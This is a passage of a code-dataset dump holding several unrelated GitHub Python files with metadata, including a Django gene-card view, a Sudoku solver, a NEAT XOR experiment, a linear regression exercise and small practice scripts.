\"NetExplorer/smesgene_card.html\"\n card_node = PlanarianGene(symbol, database)\n contigs = card_node.get_planarian_contigs()\n best_contig = card_node.get_best_transcript()\n graph = GraphCytoscape()\n card_node.get_tf_motifs(\"promoter\")\n card_node.get_tf_motifs(\"enhancer\")\n has_logo_proximal = gene_has_logo(\"promoter\", card_node.symbol)\n has_logo_enhancer = gene_has_logo(\"enhancer\", card_node.symbol)\n \n if best_contig:\n best_contig.get_homolog()\n best_contig.get_neighbours()\n best_contig.get_geneontology()\n if best_contig.homolog:\n best_contig.homolog.human.get_summary()\n nodes, edges = best_contig.get_graphelements()\n graph.add_elements(nodes)\n graph.add_elements(edges)\n\n else:\n template = \"NetExplorer/contig_card.html\"\n gsearch = GeneSearch(symbol, database)\n card_node = gsearch.get_planarian_contigs()[0]\n card_node.get_summary()\n card_node.get_neighbours()\n card_node.get_domains()\n card_node.get_geneontology()\n nodes, edges = card_node.get_graphelements()\n graph = GraphCytoscape()\n graph.add_elements(nodes)\n graph.add_elements(edges)\n except Exception as err:\n logging.error(\"Can't find symbol {} - {} in get_card() {}\".format(symbol, database, err))\n return render_to_response('NetExplorer/not_interactome.html')\n if database == \"Human\":\n response = {\n 'node' : card_node,\n 'homologs': sorted_homologs\n }\n elif database == \"Smesgene\":\n response = {\n 'node': card_node,\n 'transcripts': contigs,\n 'best_transcript': best_contig,\n 'json_graph': graph.to_json(),\n 'has_logo_proximal': has_logo_proximal,\n 'has_logo_enhancer': has_logo_enhancer\n }\n else:\n response = {\n 'node' : card_node,\n 'json_graph': graph.to_json(),\n 'domains' : card_node.domains_to_json()\n }\n \n if request.is_ajax():\n response['base_template'] = 'NetExplorer/null.html'\n else:\n response['base_template'] = 'NetExplorer/base.html'\n \n return render(request, template, response)\n\n\ndef gene_has_logo(re_type, symbol):\n print('Images/{}-images/{}-promoter.png'.format(re_type, symbol))\n return finders.find('Images/{}-images/{}-{}.png'.format(re_type, symbol, re_type))","repo_name":"scastlara/PlanNET","sub_path":"NetExplorer/views/http_api/plannet/get_card.py","file_name":"get_card.py","file_ext":"py","file_size_in_byte":5256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33675035335","text":"is_cycled = False\n\ndef dfs(adj, node):\n is_visited[node] = \"in\"\n for n in adj[node]:\n if is_visited[n] == \"in\":\n global is_cycled\n is_cycled = True\n return\n if not is_visited[n]:\n dfs(adj, n)\n is_visited[node] = True\n\n\ndef check_cycle(adj):\n for node in range(n):\n if not is_visited[node]:\n dfs(adj, node)\n\n\nn, m = map(int, input().split())\nadj = [[] for _ in range(n)]\nis_visited = [False for _ in range(n)]\nfor i in range(m):\n a, b = map(int, input().split())\n adj[a - 1].append(b - 1)\ncheck_cycle(adj)\nprint(1 if is_cycled else 0)\n","repo_name":"edadasko/coursera_algorithms","sub_path":"graphs/acyclicity.py","file_name":"acyclicity.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5939182521","text":"import argparse\nimport logging\nimport os\nimport json\nimport cv2\n\nlogging.basicConfig(level=logging.getLevelName('DEBUG'), format='%(asctime)s - %(levelname)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S')\nlogging.addLevelName(55, \"Hello!\")\nlogging.addLevelName(56, \"Goodbye!\")\nargParser = argparse.ArgumentParser(description=\"Picture and bounding box resize utility (AGAR compatible)\")\nargParser.add_argument(\"--image-folder\", default=\"images\", type=str, help=\"Path to the directory that contains images which should be resized\")\nargParser.add_argument(\"--width\", default=512, type=int, help=\"Picture width\")\nargParser.add_argument(\"--height\", default=512, type=int, help=\"Picture height\")\nargs = argParser.parse_args()\n\nlogging.log(55, 'Script started.')\n\nlogging.info(\"Creating output directory...\")\nfrom os import listdir, mkdir\nfrom os.path import isfile, join, exists\nfileList = [f for f in listdir(args.image_folder) if isfile(join(args.image_folder, f))]\noutput_folder = f\"{args.image_folder}_resized\"\nif not exists(output_folder):\n mkdir(output_folder)\n\nfor file in fileList:\n logging.info(f\"Resizing bounding boxes in {file} to {args.width}x{args.height}...\")\n if file.endswith(\".jpg\"):\n continue\n filename = os.path.splitext(file)\n\n # Load the picture to get its size\n image = cv2.imread(f\"{args.image_folder}/{filename[0]}.jpg\")\n height = image.shape[0]\n width = image.shape[1]\n\n json_file = open(f\"{args.image_folder}/{filename[0]}.json\")\n annotation = json.load(json_file)\n json_file.close()\n\n scaleX = args.width / width\n scaleY = args.height / height\n\n # Note: Slight distortion might happen if the aspect ratio changes\n for label in annotation[\"labels\"]:\n label[\"x\"] = int(label[\"x\"] * scaleX)\n label[\"width\"] = int(label[\"width\"] * scaleX)\n label[\"y\"] = int(label[\"y\"] * scaleY)\n label[\"height\"] = int(label[\"height\"] * scaleY)\n\n # Save resized picture alongside the resized annotations\n image = cv2.resize(image, (args.width, args.height), interpolation = cv2.INTER_AREA)\n cv2.imwrite(f\"{output_folder}/{filename[0]}.jpg\", image)\n with open(f\"{output_folder}/{filename[0]}.json\", 'w') as file:\n file.write(json.dumps(annotation))\n\n # DEBUG\n '''\n for label in annotation[\"labels\"]:\n cv2.rectangle(image, (label[\"x\"], label[\"y\"]), (label[\"x\"] + label[\"width\"], label[\"y\"] + label[\"height\"]), (0, 0, 255), 1)\n cv2.imshow(\"Detected Circles\", image)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n '''\n\nlogging.log(56, \"Script finished!\")","repo_name":"zingmars/bacterial-colony-analysis","sub_path":"1_Preparation/bounding_box_resize.py","file_name":"bounding_box_resize.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"31137563775","text":"import os\nimport ujson\nfrom fastapi import Request, Response, HTTPException\nfrom fastapi import APIRouter\nfrom slowapi import Limiter\nfrom slowapi.util import get_remote_address\n\n\n\nlimiter = Limiter(key_func=get_remote_address)\nrouter = APIRouter(tags=[\"Game Data\"])\n\n@router.get(\"/assets\",\n name=\"Link to download a zip with all assets\")\n@limiter.limit(\"5/second\")\nasync def assets(request: Request, response: Response):\n return {\"download-link\" : \"https://cdn.clashking.xyz/Out-Sprites.zip\"}\n\n\n\n@router.get(\"/json/{type}\",\n name=\"View json game data (/json/list, for list of types)\")\n@limiter.limit(\"5/second\")\nasync def json(type: str, request: Request, response: Response):\n if type == \"list\":\n return {\"files\" : [\"troops\", \"heroes\", \"hero_equipment\", \"spells\", \"buildings\", \"pets\", \"supers\", \"townhalls\", \"translations\"]}\n file_name = f\"game-json/{type}.json\"\n file_path = os.getcwd() + \"/\" + file_name\n with open(file_path) as json_file:\n data = ujson.load(json_file)\n return data","repo_name":"MagicTheDev/ClashKing","sub_path":"API/game_data.py","file_name":"game_data.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"54"} +{"seq_id":"30231259801","text":"def solution(record):\n\n recordlist = []\n nicknamedic = {}\n printlist = []\n\n for i in record:\n temp = i.split(' ')\n recordlist.append(temp)\n \n for rec in recordlist:\n state = rec[0]\n userid = rec[1]\n nickname = rec[2] if len(rec) > 2 else ''\n\n if userid not in nicknamedic:\n nicknamedic[userid] = nickname\n else:\n if nicknamedic.get(userid) != nickname and state != 'Leave':\n nicknamedic[userid] = nickname\n \n \n for rec in recordlist:\n state = rec[0]\n userid = rec[1]\n nickname = nicknamedic.get(userid)\n\n if state == 'Enter':\n printstr = \"%s님이 들어왔습니다.\"%nickname\n printlist.append(printstr) \n \n elif state == \"Leave\":\n printstr = \"%s님이 나갔습니다.\"%nickname\n else:\n continue\n\n answer = printlist\n \n return answer\n\ndef solution2(record):\n nicknamedic = {rec.split(' ')[1] : rec.split(' ')[-1] for rec in record if not rec.split(' ')[0] != 'Leave'}\n printlist = [f\"{nicknamedic[rec.split(' ')[1]]}님이 입장 했습니다.\" if rec.startswith('Enter') else f\"{nicknamedic[rec.split(' ')[1]]}님이 퇴장하셨습니다.\" for rec in record if not rec.split(' ')[0] =='Change' ]","repo_name":"tjsgh531/codingTest-python","sub_path":"DAY-7/solution_level2.py","file_name":"solution_level2.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17885324503","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\"\"\"\r\n\r\nimport pandas as pd\r\n\r\ndata = pd.read_csv(\"befkbhalderstatkode.csv\")\r\n\r\nrow_count = sum(1 for row in data)\r\n\r\nprint(\"pp \", row_count)\r\n","repo_name":"Burhan27/Big_Data","sub_path":"befolkningsdata.py","file_name":"befolkningsdata.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37331140822","text":"import tkinter as tk\n\n# Window and its dimensions.\nroot = tk.Tk()\nroot.geometry(\"305x365\")\n\n# Class for drawing the window.\nclass Draw():\n\n # Class initialization.\n def __init__(self, root, numbers_input):\n self.root = root\n self.grid = []\n self.numbers_input = numbers_input\n\n # Windows title.\n root.title(\"Sudoku Solver\")\n\n # Creating empty list (grid).\n for i in range(9):\n self.grid.append([0, 0, 0, 0, 0, 0, 0, 0, 0])\n\n # Drawing the input squares.\n for i in range(9):\n for j in range(9):\n # Chosing the color based on position.\n if (3 <= i <= 5) and (j < 3 or j > 5):\n color = \"grey\"\n elif (i < 3 or i > 5) and (3 <= j <= 5):\n color = \"grey\"\n else:\n color = \"white\"\n # Drawing the input squares.\n self.grid[i][j] = tk.Entry(root, width=2, font=(\"Arial\", 20),\n bg=color, borderwidth=1,\n textvar=self.numbers_input[i][j],cursor=\"arrow\")\n # Deleting input when input is invalid and user moves mouse.\n self.grid[i][j].bind(\"\", self.correct_input)\n # Organizing squares into a grid in tkinter\n self.grid[i][j].grid(row=i, column=j)\n\n # Button for clearing the board.\n clear = tk.Button(root, bg=\"grey\", text=\"Clear\", font=(\n \"Arial\", 10), fg=\"black\", command=self.clear_board)\n clear.place(x=102, y=330)\n\n # Button to solve the sudoku.\n solve = tk.Button(root, bg=\"grey\", text=\"Solve\", font=(\n \"Arial\", 10), fg=\"black\", command=self.solve)\n solve.place(x=162, y=330)\n\n # Function for correcting the input\n def correct_input(self, event):\n for i in range(9):\n for j in range(9):\n # Deletes the value if the input does not imply to conditions\n if len(self.numbers_input[i][j].get()) > 1:\n self.numbers_input[i][j].set(\"\")\n if self.numbers_input[i][j].get() not in [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]:\n self.numbers_input[i][j].set(\"\")\n\n # Function to clear the board.\n def clear_board(self):\n for i in range(9):\n for j in range(9):\n self.numbers_input[i][j].set(\"\")\n\n # Function to solve the sudoku (call the solve Class)\n def solve(self):\n solution = Solve()\n\n\n# Fill inputed number with zeros.\nnumbers_input = []\nfor i in range(9):\n numbers_input.append([0, 0, 0, 0, 0, 0, 0, 0, 0])\n\n# Add input from the user to the list.\nfor i in range(9):\n for j in range(9):\n numbers_input[i][j] = tk.StringVar(root)\n\n\nclass Solve():\n def __init__(self):\n self.fill_zero()\n self.solve()\n\n # Input zeros into empty fields\n def fill_zero(self):\n for i in range(9):\n for j in range(9):\n if numbers_input[i][j].get() not in [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]:\n numbers_input[i][j].set(0)\n\n # Return coorindates of empty field.\n def empty(self):\n for i in range(9):\n for j in range(9):\n if numbers_input[i][j].get() == \"0\":\n return (i, j)\n # If no empty field is found, nothing is returned.\n return None\n\n # Check possible numbers in one position.\n def possible(self, number, coor):\n\n # Check Row.\n for i in range(9):\n if numbers_input[coor[0]][i].get() == str(number) and coor[1] != i:\n return False\n\n # Check Column.\n for i in range(9):\n if numbers_input[i][coor[1]].get() == str(number) and coor[0] != i:\n return False\n\n # Check Square.\n box_x = coor[1] // 3\n box_y = coor[0] // 3\n\n # Check in 3x3 coordinates.\n for i in range(box_y * 3, box_y * 3 + 3):\n for j in range(box_x * 3, box_x * 3 + 3):\n if numbers_input[i][j].get() == str(number) and (i, j) != coor:\n return False\n\n return True\n\n # Function to solve sudoku using backtracking.\n def solve(self):\n empty_field = self.empty()\n\n # If nothing is empty, end the solving.\n if not empty_field:\n return True\n # Else find the coordinates of the empty field\n else:\n row, col = empty_field\n\n # If the number is possible, put it in the position.\n for i in range(1, 10):\n if self.possible(i, (row, col)):\n numbers_input[row][col].set(i)\n\n # End the function if nothing remains empty.\n if self.solve():\n return True\n\n # If nothing is possible, go back.\n numbers_input[row][col].set(\"0\")\n\n return False\n\n# Class initialization.\nDraw(root, numbers_input)\n\n# Tkinter ending the program.\ntk.mainloop()\n","repo_name":"GBoGH/Sudoku-Solver","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5094,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"41116987647","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 4 17:20:05 2019\r\n\r\n@auth farukkutlu\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n# Read the distance-matrix as 81x81 data-frame using pandas.\r\ndf1 = pd.read_excel('distancematrix.xls', header=2)\r\ndf1.drop(['İL ADI', 'İL PLAKA NO'], axis=1, inplace=True)\r\n# Read the Coordinates-matrix as 81x2 data-frame using pandas.\r\ndf2 = pd.read_excel('Coordinates.xlsx', header=0)\r\n# Converting and saving the data-frames to numpy-arrays of (81x81) and (81x2).\r\ndistances = df1.values\r\ncoordinates = df2.values\r\n#np.savetxt('Distances Array.txt', distances)\r\n#np.savetxt('Coordinates Array.txt', coordinates)\r\n# Creating the necessary functions.\r\n\"\"\" The get_path function always return with a list starting with 5.\r\n which means all the paths start with Ankara. \"\"\"\r\ndef get_path(distances, n=81):\r\n path, l, short, ind = [5], list(range(n)), 10000, 0\r\n l.pop(5)\r\n for j in range(len(l)):\r\n for i in l:\r\n if distances[path[-1],l[l.index(i)]] < short:\r\n short = distances[path[-1],l[l.index(i)]]\r\n ind = i\r\n path.append(ind)\r\n l.pop(l.index(ind))\r\n short = 10000\r\n return path\r\n\r\ndef get_path_length(path):\r\n path = np.append(path,path[0])\r\n total_length = 0.0\r\n for i in range(len(path)-1):\r\n j, k = path[i], path[i+1]\r\n total_length += distances[j, k]\r\n return total_length\r\n\r\ndef plot_path(path):\r\n path = np.append(path,path[0])\r\n latitude_list = coordinates[:,0]\r\n longitude_list = coordinates[:,1]\r\n path_latitude = latitude_list[path]\r\n path_longitude = longitude_list[path]\r\n lon, lat = np.array(path_longitude), np.array(path_latitude)\r\n img = plt.imread(\"harita.png\")\r\n fig, ax = plt.subplots()\r\n ax.imshow(img, extent=[0, 1347, 0, 721])\r\n ax.plot(lon*70-70*25.8, lat*84-84*34, '--', linewidth=2, color='firebrick')\r\n# plt.savefig('MyMap.png', dpi=1200)\r\n plt.show()\r\n return None\r\n\r\nshortest_path = get_path(distances, 81)\r\ntotal_length = get_path_length(shortest_path)\r\nprint()\r\nprint(str(total_length) + 'km calculated for the path.')\r\nplot_path(shortest_path)\r\n","repo_name":"omerfarukkutlu/python-final-project","sub_path":"My_Algorithm_Shortest_Path.py","file_name":"My_Algorithm_Shortest_Path.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36856154010","text":"def swap(lst, i, j):\n temp = lst[i]\n lst[i] = lst[j]\n lst[j] = temp\n\ndef bubble_sort(lst):\n done = False\n while not done:\n done = True\n for i in range(len(lst)-1):\n if lst[i] > lst[i+1]:\n swap(lst, i, i+1)\n done = False\n return lst\n\ndef insertion_sort(lst):\n for i in range(1, len(lst)):\n curr = lst[i]\n j = i\n while j > 0 and lst[j] < lst[j-1]:\n swap(lst, j, j-1)\n j -= 1\n return lst\n\ndef selection_sort(lst):\n for i in range(len(lst)-1):\n min_i = i\n for j in range(i+1, len(lst)):\n if lst[j] < lst[min_i]:\n min_i = j\n swap(lst, i, min_i)\n return lst\n","repo_name":"michaelschung/bc-ds-and-a","sub_path":"Unit2-Iteration/sorting/sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37510063487","text":"from django.contrib.auth.models import Permission, Group\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core.management import BaseCommand\n\nfrom apps.meituan.models import Merchant, GoodsCategory, Goods, Order\n\n\nclass Command(BaseCommand):\n # 分组创建的操作和权限的赋予\n def handle(self, *args, **options):\n # 1.编辑组\n edit_content_types = [\n ContentType.objects.get_for_model(Merchant),\n ContentType.objects.get_for_model(GoodsCategory),\n ContentType.objects.get_for_model(Goods),\n ]\n edit_permissions = Permission.objects.filter(content_type__in=edit_content_types)\n edit_group = Group.objects.create(name='编辑')\n edit_group.permissions.set(edit_permissions)\n edit_group.save()\n self.stdout.write('编辑组创建成功!')\n\n # 2.财务组\n finance_content_types = [\n ContentType.objects.get_for_model(Order),\n ]\n finance_permissions = Permission.objects.filter(content_type__in=finance_content_types)\n finance_group = Group.objects.create(name='财务')\n finance_group.permissions.set(finance_permissions)\n finance_group.save()\n self.stdout.write('财务组创建成功!')\n\n # 3.管理组\n # queryset对象不支持直接的相加‘+’的操作,这里采用的union;\n # 列表数据支持相加的操作'+'\n admin_permissions = edit_permissions.union(finance_permissions)\n admin_group = Group.objects.create(name='管理')\n admin_group.permissions.set(admin_permissions)\n admin_group.save()\n self.stdout.write('管理组创建成功!')\n","repo_name":"Cherish-1119/meituan","sub_path":"apps/mtauth/management/commands/initgroup.py","file_name":"initgroup.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29707032466","text":"#!/usr/bin/python3\nfrom __future__ import print_function\n\nimport os\nimport sys\n#sys.path.insert(0, '/home/peter/code/projects/MultiNEAT') # duh\nimport time\nimport random as rnd\nimport numpy as np\nimport pickle as pickle\nimport MultiNEAT as NEAT\nfrom MultiNEAT import EvaluateGenomeList_Serial\nfrom MultiNEAT import GetGenomeList, ZipFitness\n\nfrom concurrent.futures import ProcessPoolExecutor, as_completed\n\n\ndef evaluate(genome):\n net = NEAT.NeuralNetwork()\n genome.BuildPhenotype(net)\n\n error = 0\n\n # do stuff and return the fitness\n net.Flush()\n net.Input(np.array([1., 0., 1.])) # can input numpy arrays, too\n # for some reason only np.float64 is supported\n for _ in range(2):\n net.Activate()\n o = net.Output()\n error += abs(1 - o[0])\n\n net.Flush()\n net.Input([0, 1, 1])\n for _ in range(2):\n net.Activate()\n o = net.Output()\n error += abs(1 - o[0])\n\n net.Flush()\n net.Input([1, 1, 1])\n for _ in range(2):\n net.Activate()\n o = net.Output()\n error += abs(o[0])\n\n net.Flush()\n net.Input([0, 0, 1])\n for _ in range(2):\n net.Activate()\n o = net.Output()\n error += abs(o[0])\n\n return (4 - error) ** 2\n\n\nparams = NEAT.Parameters()\nparams.PopulationSize = 100\nparams.DynamicCompatibility = True\nparams.NormalizeGenomeSize = True\nparams.WeightDiffCoeff = 0.1\nparams.CompatTreshold = 2.0\nparams.YoungAgeTreshold = 15\nparams.SpeciesMaxStagnation = 15\nparams.OldAgeTreshold = 35\nparams.MinSpecies = 2\nparams.MaxSpecies = 10\nparams.RouletteWheelSelection = False\nparams.RecurrentProb = 0.0\nparams.OverallMutationRate = 1.0\n\nparams.ArchiveEnforcement = False\n\nparams.MutateWeightsProb = 0.05\n\nparams.WeightMutationMaxPower = 0.5\nparams.WeightReplacementMaxPower = 8.0\nparams.MutateWeightsSevereProb = 0.0\nparams.WeightMutationRate = 0.25\nparams.WeightReplacementRate = 0.9\n\nparams.MaxWeight = 8\n\nparams.MutateAddNeuronProb = 0.001\nparams.MutateAddLinkProb = 0.3\nparams.MutateRemLinkProb = 0.0\n\nparams.MinActivationA = 4.9\nparams.MaxActivationA = 4.9\n\nparams.ActivationFunction_SignedSigmoid_Prob = 0.0\nparams.ActivationFunction_UnsignedSigmoid_Prob = 1.0\nparams.ActivationFunction_Tanh_Prob = 0.0\nparams.ActivationFunction_SignedStep_Prob = 0.0\n\nparams.CrossoverRate = 0.0\nparams.MultipointCrossoverRate = 0.0\nparams.SurvivalRate = 0.2\n\nparams.MutateNeuronTraitsProb = 0\nparams.MutateLinkTraitsProb = 0\n\nparams.AllowLoops = True\nparams.AllowClones = True\n\ndef getbest(i):\n g = NEAT.Genome(0, 3, 0, 1, False, NEAT.ActivationFunction.UNSIGNED_SIGMOID,\n NEAT.ActivationFunction.UNSIGNED_SIGMOID, 0, params, 0)\n pop = NEAT.Population(g, params, True, 1.0, i)\n pop.RNG.Seed(int(time.clock()*100))\n\n generations = 0\n for generation in range(1000):\n genome_list = NEAT.GetGenomeList(pop)\n fitness_list = EvaluateGenomeList_Serial(genome_list, evaluate, display=False)\n NEAT.ZipFitness(genome_list, fitness_list)\n pop.Epoch()\n generations = generation\n best = max(fitness_list)\n if best > 15.0:\n break\n\n return generations\n\n\ngens = []\nfor run in range(100):\n gen = getbest(run)\n gens += [gen]\n print('Run:', run, 'Generations to solve XOR:', gen)\navg_gens = sum(gens) / len(gens)\n\nprint('All:', gens)\nprint('Average:', avg_gens)\n","repo_name":"peter-ch/MultiNEAT","sub_path":"examples/TestNEAT_xor.py","file_name":"TestNEAT_xor.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","stars":323,"dataset":"github-code","pt":"54"} +{"seq_id":"30805456375","text":"import requests as rq\nfrom tabulate import tabulate\n\ndata = []\n# aqui obtengo el nombre de pikachu solicitandolo a la api de pokemon\n# response = rq.get(\"https://pokeapi.co/api/v2/pokemon/25\")\n# rs = response.json()\n# rs2 = rs[\"forms\"][0][\"name\"]\n# print(rs2)\n\nresponse2 = rq.get(\"https://pokeapi.co/api/v2/pokemon?limit=100\")\nres = response2.json()\nfor i in range(25):\n data.append([i + 1, res[\"results\"][i][\"name\"], res[\"results\"][i][\"url\"]])\n\ntabla = tabulate(data, headers=[\"Nº\", \"NAME\", \"URL\"])\nprint(\"\\n\\n\", tabla, \"\\n\\n\")","repo_name":"LeoMarqz21/Algoritmos_con_python","sub_path":"ConsultaApi.py","file_name":"ConsultaApi.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72171943203","text":"\"\"\"\nLinear Regression Project\n\"\"\"\nfrom warnings import filterwarnings\nfrom numpy import sqrt\nfrom pandas import read_csv, DataFrame\nfrom matplotlib.pyplot import show, scatter, xlabel, ylabel, figure\nfrom seaborn import set_palette, set_style, jointplot, pairplot, lmplot, distplot\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error\n\n# Get the Data\nfilterwarnings(\"ignore\", category=FutureWarning)\ncustomers = DataFrame(read_csv(\"Ecommerce Customers\"))\nprint(customers.head())\nprint(customers.describe())\nprint(customers.info())\n\n# Exploratory Data Analysis\nset_palette(\"GnBu_d\")\nset_style(\"whitegrid\")\n# More time on site, more money spent.\njointplot(x=\"Time on Website\", y=\"Yearly Amount Spent\", data=customers)\njointplot(x=\"Time on App\", y=\"Yearly Amount Spent\", data=customers)\njointplot(x=\"Time on App\", y=\"Length of Membership\", kind=\"hex\", data=customers)\npairplot(customers)\nlmplot(x=\"Length of Membership\", y=\"Yearly Amount Spent\", data=customers)\n\n# Training and Testing Data\nX = customers[\n [\"Avg. Session Length\", \"Time on App\", \"Time on Website\", \"Length of Membership\"]\n]\ny = customers[\"Yearly Amount Spent\"]\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.3, random_state=101\n)\n\n# Training the Model\nlm = LinearRegression()\nlm.fit(X_train, y_train)\n# The coefficients\nprint(\"Coefficients: \\n\", lm.coef_)\n\n# Predicting Test Data\npredictions = lm.predict(X_test)\nfigure()\nscatter(y_test, predictions)\nxlabel(\"Y Test\")\nylabel(\"Predicted Y\")\n\n# Evaluating the Model\nprint(\"MAE:\", mean_absolute_error(y_test, predictions))\nprint(\"MSE:\", mean_squared_error(y_test, predictions))\nprint(\"RMSE:\", sqrt(mean_squared_error(y_test, predictions)))\n\n# Residuals\nfigure()\ndistplot((y_test - predictions), bins=50)\n\n# Coefficients\ncoeffecients = DataFrame(lm.coef_, X.columns)\ncoeffecients.columns = [\"Coeffecient\"]\nprint(coeffecients)\n\n# LAST STEP\nshow()\n","repo_name":"jgyy/py-dsml-jose","sub_path":"15/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12260550705","text":"# Given an array containing None values fill in the None values with most recent\r\n# non None value in the array\r\n\r\narray1 = [1, None, 2, 3, None, None, 5, None]\r\n\r\n\r\ndef solution(nums):\r\n for ind, num in enumerate(nums):\r\n if num is None:\r\n nums[ind] = nums[ind-1]\r\n\r\n return nums\r\n\r\n\r\n# Given two sentences, return an array that has the words that appear in one sentence and not\r\n# the other and an array with the words in common.\r\n\r\nsentence1 = 'We are really pleased to meet you in our city'\r\nsentence2 = 'The city was hit by a really heavy storm'\r\n\r\n\r\ndef solution2(sent1, sent2):\r\n\r\n common = []\r\n not_common = []\r\n\r\n sent1 = sent1.split()\r\n sent2 = sent2.split()\r\n\r\n for word1 in sent1:\r\n for word2 in sent2:\r\n if word1 == word2:\r\n common.append(word1)\r\n\r\n for word in sent1:\r\n if word not in common:\r\n not_common.append(word)\r\n\r\n for word in sent2:\r\n if word not in common:\r\n not_common.append(word)\r\n\r\n return common, not_common\r\n\r\n\r\n# Given k numbers which are less than n, return the set of prime number among them\r\n# Note: The task is to write a program to print all Prime numbers in an Interval.\r\n# Definition: A prime number is a natural number greater than 1 that has no positive divisors other than 1 and itself.\r\n\r\nn = 35\r\n\r\n\r\ndef solution3(num):\r\n\r\n primes = set()\r\n for i in range(2, num):\r\n prime_flag = 0\r\n for j in range(2, i):\r\n if i % j == 0:\r\n prime_flag = 1\r\n\r\n if prime_flag == 0:\r\n primes.add(i)\r\n\r\n return primes\r\n\r\n\r\nprint(solution3(n))\r\n","repo_name":"lukekasper/Personal-Projects","sub_path":"Python_Practice/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42142143888","text":"def main():\n repeat= int(input(\"¿Cuantos usuarios quieres introducir?: \"))\n username = list()\n departament = list()\n classroom = list()\n for i in range(repeat):\n username.append(str(input(\"\\n¿Cual es el nombre del alumno?: \")))\n departament.append(str(input(\"¿Cual es el nombre del departamento?: \")))\n classroom.append(int(input(\"¿Que número tiene la clase?: \")))\n while 1 < classroom[-1] > 15:\n classroom.append(int(input(\"¿Vuelve a introducir el número que tiene la clase?(1-15): \")))\n students = {\n \"username\": username,\n \"departament\": departament,\n \"classroom\": classroom\n }\n for y in students:\n print(\"\\n |\", students[y], end=\" | \\n\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Hbohera/PG-UF1-Python","sub_path":"Ejercicio3.py","file_name":"Ejercicio3.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72116335523","text":"import torch.nn as nn\nimport torch\nimport numpy as np\nimport model\nfrom typing import List\n\npos_weight = torch.ones([len(model.bboxs)]) # All weights are equal to 1\ncriterion = torch.nn.BCEWithLogitsLoss(pos_weight=pos_weight)\n\nl2_loss_func = nn.MSELoss(reduction='sum')\n\n# Target 0, 1\n# Output 0, 1\n\n\n\ndef loss_fn(output, target):\n #plane_count = torch.sum(target) # 10\n #if plane_count == 0:\n # plane_count = torch.tensor(1)\n\n # l1_loss = torch.abs(torch.sub(output, target))\n \n l2_loss = l2_loss_func(output, target)\n\n #LM_CONSTANT = (1/l2_loss)*0.4\n loss = l2_loss #+ (torch.sum(torch.clamp(target - output, min=0, max=1)) / plane_count)*LM_CONSTANT\n return loss\n # return nn.BCELoss()(output, target)\n #return nn.CrossEntropyLoss()(output, target)\n #scale = 1000\n # print('newly loaded 3')\n # print('output', output)\n # print('target', target)\n #diff = torch.sub(target, output)\n # print('difference ', diff)\n #scaled = torch.mul(diff, scale)\n # print('Scaled ', scaled)\n #squared = torch.square(scaled)\n # print('squared ', squared)\n #sum_loss = torch.sum(squared)\n # print('sum_loss', sum_loss)\n #loss = torch.div(sum_loss, torch.numel(target))\n # print('loss', loss)\n #plane_count = torch.sum(target)\n\n #return loss\n # print('plane_count', plane_count)\n #if plane_count == 0:\n # return loss\n #else:\n # loss = torch.divide(loss, plane_count)\n # #print('after divide', loss)\n # return loss\n\n\ndef calculate_target_vector(bboxs: List[List[float]]):\n target_vector = np.zeros(len(model.np_bboxs))\n for bbox in bboxs:\n xA = np.maximum(model.np_bboxs[:, 0], bbox[0])\n yA = np.maximum(model.np_bboxs[:, 1], bbox[1])\n xB = np.minimum(model.np_bboxs[:, 2], bbox[2])\n yB = np.minimum(model.np_bboxs[:, 3], bbox[3])\n interArea = np.maximum(0, xB - xA + 1) * np.maximum(0, yB - yA + 1)\n boxAArea = (model.np_bboxs[:, 2] - model.np_bboxs[:, 0] + 1) * \\\n 